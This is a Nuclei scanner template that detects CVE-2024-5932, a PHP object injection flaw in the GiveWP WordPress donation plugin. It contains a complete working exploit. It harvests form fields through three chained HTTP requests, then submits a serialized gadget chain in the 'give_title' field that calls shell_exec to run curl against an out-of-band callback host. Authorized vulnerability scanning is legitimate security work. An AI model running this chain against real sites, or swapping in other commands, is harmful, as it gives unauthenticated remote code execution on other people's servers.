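id: CVE-2024-5932

info:
  name: GiveWP - PHP Object Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.1 via deserialization of untrusted input from the 'give_title' parameter.
  impact: |
    This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to execute code remotely, and to delete arbitrary files.
  remediation: Fixed in 3.14.2.
  reference:
    - https://plugins.trac.wordpress.org/browser/give/tags/3.12.0/includes/login-register.php#L235
    - https://plugins.trac.wordpress.org/browser/give/tags/3.12.0/includes/process-donation.php#L420
    - https://plugins.trac.wordpress.org/browser/give/tags/3.12.0/src/DonorDashboards/Tabs/EditProfileTab/AvatarRoute.php#L51
    - https://plugins.trac.wordpress.org/browser/give/tags/3.12.0/vendor/tecnickcom/tcpdf/tcpdf.php#L7861
    - https://plugins.trac.wordpress.org/browser/give/tags/3.12.0/vendor/vendor-prefixed/fakerphp/faker/src/Faker/ValidGenerator.php#L80
    - https://www.rcesecurity.com/2024/08/wordpress-givewp-pop-to-rce-cve-2024-5932/
    - https://thehackernews.com/2024/08/givewp-wordpress-plugin-vulnerability.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-5932
    cwe-id: CWE-502
    epss-score: 0.00178
    epss-percentile: 0.55631
    cpe: cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: givewp
    product: givewp
    framework: wordpress
    publicwww-query: "/wp-content/plugins/give/"
  tags: cve,cve2024,rce,wp,wp-plugin,wordpress,oast,givewp

# Three-step chain: (1) list donation forms over the WP REST API, (2) load the
# form page to harvest the hidden anti-tamper fields (hash, id prefix, minimum
# amount), (3) submit a donation whose give_title carries the serialized gadget.
flow: http(1) && http(2) && http(3)

variables:
  oast: "{{interactsh-url}}"
  # Byte length of the string 'curl <oast>': 5 bytes for the 'curl ' prefix plus
  # the interactsh hostname. PHP unserialize() rejects the payload if this
  # length does not match the literal exactly.
  len_payload: "{{ len(oast) + 5 }}"
  # WARNING: this is an active exploit, not a passive check. The gadget chain
  # ends in Faker\ValidGenerator with validator=shell_exec, so the target runs
  # `curl <interactsh>` as the web-server user. Only run with explicit
  # authorization. Confirmation depends on the target having curl and outbound
  # HTTP egress; a host without either is vulnerable but will not match.
  # The payload is substituted into the form body without URL-encoding; that
  # works because the serialized string contains none of & = + % (only
  # " ; : { } and backslashes, which x-www-form-urlencoded parsing passes
  # through). NOTE(review): the doubled backslashes in the class names are kept
  # as in the original; the right count depends on how many unslash passes the
  # plugin applies to $_POST (WordPress slashes request data) — confirm against
  # the target version before changing them.
  payload: 'O:19:"Stripe\\\\StripeObject":1:{s:7:"_values";a:1:{i:0;O:62:"Give\\\\PaymentGateways\\\\DataTransferObjects\\\\GiveInsertPaymentData":1:{s:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:9:"container";O:33:"Give\\\\Vendors\\\\Faker\\\\ValidGenerator":3:{s:9:"generator";O:24:"Give\\\\Container\\\\Container":1:{s:9:"instances";a:1:{s:8:"address1";s:{{len_payload}}:"curl {{oast}}";}}s:10:"maxRetries";i:1;s:9:"validator";s:10:"shell_exec";}}}}}}'
  # Randomised donor identity so repeated runs do not collide on the same donor.
  email: "{{to_lower(rand_text_alpha(8))}}@gmail.com"
  firstname: "{{to_lower(rand_text_alpha(5))}}"
  lastname: "{{to_lower(rand_text_alpha(5))}}"

http:
  # Step 1: discover a donation form (slug, rendered title, permalink) via the
  # public REST endpoint. All extractors are internal: they feed later requests
  # and are not reported.
  - raw:
      - |
        GET /wp-json/wp/v2/give_forms/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - '"type":'
          - '"guid":'
        condition: and
        internal: true

    extractors:
      - type: json
        part: body
        name: value
        internal: true
        json:
          - '.[0].slug'

      - type: json
        part: body
        name: give-form-title
        internal: true
        json:
          - '.[0].title.rendered'

      - type: json
        part: body
        name: links
        internal: true
        json:
          - '.[0].link'

  # Step 2: render the form in iframe mode and pull the hidden fields the
  # donation handler validates (form hash, id prefix, form id, minimum amount).
  - raw:
      - |
        GET /give/{{value}}?giveDonationFormInIframe=1 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - 'give-form-hash'
          - 'give-form-id-prefix'
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        group: 1
        name: give-form-hash
        internal: true
        regex:
          - 'name="give\-form\-hash" value="([0-9a-z]+)"'

      - type: regex
        part: body
        group: 1
        name: give-form-id-prefix
        internal: true
        regex:
          - 'name="give\-form\-id\-prefix" value="([0-9-]+)"'

      - type: regex
        part: body
        group: 1
        name: give-form-id
        internal: true
        regex:
          - 'name="give\-form\-id" value="([0-9]+)"'

      # NOTE(review): this pattern depends on the minimum-amount input being
      # split across two lines (`\n` followed by whitespace before value=);
      # a differently rendered form would leave give-amount unset.
      - type: regex
        part: body
        group: 1
        name: give-amount
        internal: true
        regex:
          - 'give\-form\-minimum"\n\s+value="([0-9.]+)"\/>'

  # Step 3: submit the donation through admin-ajax with the manual gateway so
  # no payment provider is involved; give_title carries the gadget chain.
  # NOTE(review): give-form-title and links are substituted raw, not
  # URL-encoded; a rendered title containing '&' (e.g. an HTML entity) would
  # split the form body and break the request.
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        give-honeypot=&give-form-id-prefix={{give-form-id-prefix}}&give-form-id={{give-form-id}}&give-form-title={{give-form-title}}&give-current-url={{links}}&give-form-url={{RootURL}}&give-form-minimum={{give-amount}}&give-form-maximum=1000000&give-form-hash={{give-form-hash}}&give-price-id=custom&give-amount={{give-amount}}&give_first={{firstname}}&give_last={{lastname}}&give_email={{email}}&give_stripe_payment_method=&give-user-id=1&give_action=purchase&give-gateway=manual&give_embed_form=1&action=give_process_donation&give_title={{payload}}

    # Require both the out-of-band HTTP callback (proof of command execution)
    # and the plugin's JSON error body from the same request, so a stray
    # interactsh hit from another source is not reported as a finding.
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: body
        words:
          - '"error_data"'
          - '"unknown_error"'
        condition: and
# The digest below is the template signer's signature over the original file
# body; any edit to this file (including whitespace) invalidates it, so re-sign
# the template or expect Nuclei to treat it as unsigned.
# digest: 4a0a004730450220051775121bbd5c861e8f0adf15b33ef21e3e2420f6ff3e9d42035a160968ba7e02210096d8c4a2c1bf78dd4ec442a1c63d2ea90e194b45a4549c270a864cac3ab0b2c8:922c64590222798bb761d5b6d8e72950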